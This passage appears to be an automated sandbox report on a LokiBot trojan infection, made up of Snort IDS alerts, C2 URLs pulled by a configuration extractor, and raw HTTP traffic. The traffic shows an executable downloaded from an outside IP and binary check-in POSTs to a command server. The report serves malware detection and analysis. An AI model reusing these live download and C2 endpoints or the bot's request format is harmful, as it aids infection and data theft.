              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 172.67.197.66:80
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewIP Address: 198.46.132.195 198.46.132.195
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Feb 2022 09:21:50 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Feb 2022 03:31:37 GMTETag: "480d4-5d7a1966fd8a9"Accept-Ranges: bytesContent-Length: 295124Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
              Source: global trafficHTTP traffic detected: GET /windowSSH/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 10 Feb 2022 09:21:59 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B14QjzK93WN7FMCRwgPdBoL4GvyuLTCNzn128gIE66EmvAljQdFfNPOn5qPxQ8nApBsPYHTSjURn1ssUf9vIO%2F1OL2%2BdI5plkWkZzNc4H79V9rsVWKoyCfjhFO%2FkqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 6db4453c8e679137-FRA
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 10 Feb 2022 09:22:03 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lb9okY1H6vGjyVC1u7%2FrtI1IlQS%2BFDAUyP1p%2FRqqpdW3oHWuKdkbXEj1FlsGoYPfJTBdMWMce2JdGAcisXgmjvWPRjePl3xI2oQ%2BLjS4JVazUAB%2FtUVsenR8M%2BuUug%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 6db44555fbc890ee-FRA
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6CwJYTVGa3AnJcsAqL3zNlmjIgfexUkjM4cyDshIwsGRdfYIgN3bflXQh2onteNJ926X8WPY94crt1e3EfkgcxXiKtHHMa5TzW7hc2Hyll4xmtK3kqtsPyKPeb2HQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db445e4bcca91ed-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFC3rc2PYyOGWitcWjhM03gTv0UwrpD%2FeLJzaq90%2BkjJJnsYFLs3%2B9G23tgPe1ch9t2Z3Xrks%2BoXkXgsLvtmsDrXa8JBOdIJfr6DqInywGS59STYxucek4Q2WmLQpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db445eb1e9f9189-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uD7gJsujl0qEAxulzRwvTC2Sbt%2Bi4TFWvsjpt5CDloaVfn3Dt69l4iJM31MUngIv0nBezN298VraYSCFYdNpO%2FbJ4t7%2BWNOgx7HdyUwSUfBLC4eOt4PcY93RnkUHlQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db445f3db6a5b3e-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvu1d3Vbzy6ZrTPTFWBGN7iEn1tx2RtWGRh2C76Vr5y%2B0NzzM1MCSCMy1A4AVEtbLBuKmRIr5zzqHNenni2AJ%2BwOtJJ179UjFozvWTm5cwFRvpN7D1tfeYfx%2FVlSLg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db445fe9dc491ed-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7e4ivEN%2FfJbqg0IR30Nk7YLjE6R7gK9YQJH1DfEk3kbRoonUj0tMEraY%2BRjwLn7cP%2BNl78SF30VWW7AmBXj15TgGfudTHrRaK3bi%2FP7OjjFNWbyUKgOHiQu4SXY%2FXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446054d3a9274-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WPprCDT9p343%2B%2BVa2BjaOyqYMB95UNCR5Ua%2FE%2FsZWRzD2F%2FUvoXHTkn2yAiBthKWkFusxeyRDME7Rpcj9nFv2dMiYrPffSB1GdxIUmMvBnBIuGG6eMWuphVFNIVyRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4460bfe8a9168-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wShLmzxohhsviCUMQ%2FlqpiKLuE1FOqvf4YebS5qugs3Dzn05nwu27HDgM4qgHb10Sommq5Eo%2FITERtrckpOYW58EIm11S3Cxr5FX3Wb1wYzMe0KX2DB0%2FCIuyrBw%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4461298c49180-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uRm6cbs7qjH2NOHh2tOKIkP%2BdzbOwZXOMBEJgE3gb2LRZ5T9DoyDbWgSAgyAW9SjYweFy2OcxyEn%2BT93qxg4gzWWmZP%2Bi0t5VxRBmaJZLw%2FLRVoZMESNjhIGteoHMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4461928579004-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xrOr1KSQmX9JZILB3weUMlW6l%2F0jQY3ebDX3HclhX28Mcc%2FxH30ewiGA0h%2B6cIBx8JHVt3F2yuoloaiZkYlnrBJGiKNxRH6q72FSDnO4vOtUB%2F3%2FUP0EEMJM1AusYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4461f7a6a9079-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RG%2BfeuYDl%2BqDfIJiQqO%2F%2BvdeX%2FsqQOMNdYojKtTw1E0TmD5kZfpZ7nDimmccAbecgCEw4KhPek%2BrNtGEwSzq0DOsMtNFWpBsI22TENldaFbPIU5b5CTiuxOP6VQaaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446260fb19019-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8i3MYQHtfXVP%2F0fASkC1TmdLbF6CiAiraD%2FH44NC0ykl97qHV9jn8MkbKPqY5BdlYRn49S%2F8lYCjj%2FQu3cIXkHTHLxiFgznNR4%2Bp6Kgrrg52L092%2FlGqFymsCMGR0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4462c9e3791fc-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8IzBsU9ezcfTcYipeA3VQtk7w40pxZ5hjlcKQvqw49ojoP1nGh40I6q6Dyh76z4LCC%2BA20%2Fsg0VifVwdOdSi33A6OvrYN65%2FpXFFW%2FSM0mozc%2B4piSK803pIJT8SEw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446333d2791ff-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9t3R%2F4b%2BnD1kTHMJA2ZVHrmeMMJ3Bd02VhJ1WPbcEvJly%2BkAhl4QMrCDxePymIvRWvfDOjaPHdcP0k0kjEFpUPsz22Xy7Rg%2F6wzikwLkWIzwoyWJkUL5tvQWI96tAw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4463aab43920b-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U73XLOsc6Oe9yZY%2B47E4Oe8aR4QjbykbQwVxWcy4AoCZmzTRfSc4KodkgvxCsNphdTrX0C20cDMAGUY1y%2Fzw8iNzNLGyI2dqsO%2B6Mc%2FCxzGZVmVZz0bSOwNj1s7QeA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446410864918f-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gufXVp6viiLfqUVAIhTCHjYJOWCjHt2MTTOHWp5%2BFhyL3M%2BbMbx%2BVMYETZElkIaZ%2FIvrsDt5jDpyZjmMZ9o2O%2FwcV9pRsZqOTc1AF0p2Ib213bW35V6pz00NvcCpPA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44647eb7b693a-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yKL07jfvs%2BVU4LY4v4Lf0ZGlr%2FIQtMwEPs3bXhHAZspcC%2BNoewD0Rp%2Bye%2FUTm0R72TSKjFoKvNaY7JUUOQLFHqLgLo%2BRTvtpResbSpFvDqoGUIkATecZSSRbWV5rqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4464e3d16912a-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YEpekNteQXIJDJauaElbNeLCz0rJIFKhZ7g570xBDVwmYpo12zP6dtthdwoFyYhQ53RMVLKxNG0u7RjPVwRtZkMkV1Qw90wv9Z0CU6vQQlTHweFh1xgcsARiAUxjiQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44654bfd79199-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgBF41clmh4ryuHtU9aOlwd5HEGXjVWqgWBKt0N2O3lBaHqKVGyePCSnXUW7Z%2B9ZswG3zzpAggxRL3OI9PhK3b7diqp15dvDHTlhkQ9V7NyyEid0hjMzsNR7GBdvGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4465b4f709186-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIeTn8QUGJ4PzoL3khYwIjL17%2BBJiTqpZBu%2Bn6l1sSUiSmu%2FH0zc5lyfpLKOHy9tsuu9Y%2F%2BH47s3hpg5DfFC4zroN87eErlds3zDKfV6u79W6o1WqB%2F6UGbnxHqWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446621d638fc5-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6LETH6p%2BXICZC%2BrIHSRQApAEV%2Bdr0iLIW7rBeA%2Fr7Hi4%2Fpf1OlVs9AUjZdSrzw3XtXmW7vu3g0lnMlRgI0IK52z10KSNGVwmWG%2FAp9wtB9EgWL0CS5tO1Mwb6FiG8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446686e9b6945-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M4V5E6ygM8Zq2gQc6SjFi%2FduljsFbImOHJ2nmf7IuPxW2RhXkT%2B0BhOAD5WjYjJ5QxUVoGAUnhyaY3n4fiulEfle%2F5%2F3JKoNA8quALyniLNaaaxsFzuwruQ92V8j%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4466f4f5c92a2-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sfchENBNL5Aam3jQilD1C%2BA7X%2BWklnynb2xLSVS2hPjR0y3qmNn6hmUtwb8IQB8oZoMl23JHAHV2q0I12pykgsoVoLNPvb6k5VdZyObk9ltGFYeKlP7GBpYhUI6%2BpA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44675ef0390ee-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
